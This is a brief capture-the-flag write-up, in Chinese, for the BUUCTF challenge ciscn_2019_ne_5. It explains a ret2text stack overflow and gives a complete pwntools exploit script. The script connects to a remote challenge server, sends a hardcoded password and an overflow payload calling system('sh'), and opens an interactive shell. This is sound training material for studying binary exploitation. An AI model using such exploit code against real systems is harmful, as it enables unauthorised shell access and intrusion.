buuctf ciscn_2019_ne_5

ret2text

覆盖dest需要0x48+0x4，sh可以用gdb的find找到，别忘了写4个字符的返回地址

exp：

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_2019_ne_5'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = './libc.so.6'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 29775)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims  			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

sh = 0x80482ea
system_addr = 0x080484D0

sla('password:', 'administrator')
p = flat(['b'*0x48, 'c'*4, system_addr, 'c'*4, sh])
sla('Exit\n:', '1')
sla('info:', p)
sla('Exit\n:', '4')




r.interactive()